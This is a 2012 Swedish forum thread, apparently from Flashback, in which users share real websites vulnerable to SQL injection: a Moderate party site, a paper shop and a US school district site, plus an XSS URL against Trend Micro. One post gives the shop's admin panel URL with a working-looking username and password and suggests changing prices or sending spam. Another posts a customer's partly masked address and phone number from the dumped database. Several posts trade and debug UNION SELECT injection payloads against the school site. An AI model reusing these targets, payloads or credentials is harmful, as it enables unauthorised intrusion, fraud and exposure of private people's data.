2012-01-14, 15:39
  #3589
Bannlyst
Citat:
Ursprungligen postat av Butikskontrollant
http://sundsvallsmoderaterna.se som är hostad av: http://www.gafvert.net är sårbar för SQLi.

Sitter tyvärr inte framför min dator just nu, har bara dumpat ytterst lite från databasen.
Databasen har 500+ användare allt från folk som sitter i styrelsen till riksdagsledamöter i riksdagen.

Många lösenord använder de till sitt intranät för moderat.se dessutom.

Så om någon av er vill ha lite skojj så varsågod!


Kan du ge den exakta länken du vet ' saken
Citera
2012-01-14, 15:42
  #3590
Medlem
Citat:
Ursprungligen postat av Oops12
Kan du ge den exakta länken du vet ' saken

http://www.gafvert.net/indexmsp.asp?...id=1&artid=491
Citera
2012-01-16, 09:19
  #3591
Medlem
Citat:
Ursprungligen postat av Peteq
http://www.gafvert.net/indexmsp.asp?...id=1&artid=491
http://www.gafvert.net/index.asp?id=3&subid=1&orgid=1
Även här sårbart för SQLi.

Men några 500+ användare har jag inte hittat, vilken tabell skulle dessa ligga i isåfall?
Citera
2012-01-19, 18:51
  #3592
Medlem
Theezs avatar
http://us.trendmicro.com/us/search/i...;%3C/script%3E

(:
Citera
2012-01-19, 21:47
  #3593
Medlem
pernila12s avatar
Citat:
Ursprungligen postat av histamin
[url]
www.papercutshop.se/003.php?ID=12289


www.papercutshop.se/003.php?ID=12289

Ingen annan än jag som varit runt o rotat i deras databas?
Under "u1313788_3" finns ju "kunder" där både eposten och lösenorden är i klartext!

Sen kan man alltid gå in på deras hemsida ändra priser eller skicka ut spamm genom deras admin panel som ni hittar på

http://www.papercutshop.se/admin/

user/pass

dd/9LeN7aP


Eller om ni vill så kan ni kontakta dom på!

Kontakta oss:
Tel. +46 8 133574
Email: info@papercutshop.se
Citera
2012-01-19, 22:38
  #3594
Medlem
Korvmackas avatar
Citat:
Ursprungligen postat av pernila12
www.papercutshop.se/003.php?ID=12289

Ingen annan än jag som varit runt o rotat i deras databas?
Under "u1313788_3" finns ju "kunder" där både eposten och lösenorden är i klartext!

Sen kan man alltid gå in på deras hemsida ändra priser eller skicka ut spamm genom deras admin panel som ni hittar på

http://www.papercutshop.se/admin/

user/pass

dd/9LeN7aP


Eller om ni vill så kan ni kontakta dom på!

Kontakta oss:
Tel. +46 8 133574
Email: info@papercutshop.se

Kund: Henr** Schyffe**
Hackspettsvä*** 3
167 65
Bromma
henrik.sch*****@telia.com +46 70 733 ****

Lite intressant, han hade nog inte blivit så glad va ?
Citera
2012-01-21, 19:54
  #3595
Medlem
pernila12s avatar
Citat:
Ursprungligen postat av Korvmacka
Kund: Henr** Schyffe**
Hackspettsvä*** 3
167 65
Bromma
henrik.sch*****@telia.com +46 70 733 ****

Lite intressant, han hade nog inte blivit så glad va ?


Nepp det hade han nog inte blivit!

Frågan är bara varför fixar dom inte hålet?
Citera
2012-01-22, 11:25
  #3596
Medlem
http://www.cmcss.net/Schools/schoolw....asp?locid=230
Citera
2012-01-22, 13:08
  #3597
Medlem
Korvmackas avatar
Citat:
Ursprungligen postat av pernila12
Nepp det hade han nog inte blivit!

Frågan är bara varför fixar dom inte hålet?
Hålet är väl numera fixat ?

Citat:
Ursprungligen postat av Peteq
http://www.cmcss.net/Schools/schoolw....asp?locid=230
- Vad exakt är hackat ? kanske är lite trög men jag kommer ingenvart ?


_______________________________

TILF ! Epic Win ! http://www.cmcss.net/Schools/schoolw...asp?empid=1026
__________________
Senast redigerad av Korvmacka 2012-01-22 kl. 13:12.
Citera
2012-01-23, 02:04
  #3598
Medlem
jonthe12s avatar
Citat:
Ursprungligen postat av Peteq
http://www.cmcss.net/Schools/schoolw....asp?locid=230

http://www.cmcss.net/Schools/schoolwebsites/administration.asp?locid=230%27%20UNION%20SELECT%2 0ALL%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--

Någon som vet hur man löser detta felet?

Citat:
All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists.

17 kolumner ska det vara
Citera
2012-01-24, 17:34
  #3599
Medlem
Citat:
Ursprungligen postat av jonthe12
http://www.cmcss.net/Schools/schoolwebsites/administration.asp?locid=230%27%20UNION%20SELECT%2 0ALL%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--

Någon som vet hur man löser detta felet?



17 kolumner ska det vara

UNION ALL SELECT inte UNION SELECT ALL.
Citera
2012-01-25, 02:02
  #3600
Medlem
jonthe12s avatar
Citat:
Ursprungligen postat av random7
UNION ALL SELECT inte UNION SELECT ALL.

Ojssan! samma error kvarstår dock
Citera

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in